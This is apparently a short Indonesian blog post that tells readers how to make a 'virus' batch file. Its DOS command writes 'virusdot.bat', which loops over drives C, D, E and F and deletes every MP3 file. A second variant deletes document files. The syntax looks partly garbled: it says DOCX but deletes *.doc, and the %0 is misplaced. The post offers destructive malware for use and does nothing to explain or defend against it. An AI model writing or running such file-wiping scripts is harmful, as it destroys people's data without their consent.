kamu tulis syntax di command prompt(DOS) seperti di bawah :
echo for %%p in (C D E F) do del *.mp3 %0 %%p:>virusdot.bat
Nanti, virus akan menyusup ke drive C, D, E, dan F untuk menghapus
file MP3.Sekarang apabila berniat jenis file tertentu, misal file
dokumen (DOCX), syntax-nya menjadi:
echo for %%p in (C D E F) do del *.doc %0 %%p:>virusdot.bat
0 comments:
Post a Comment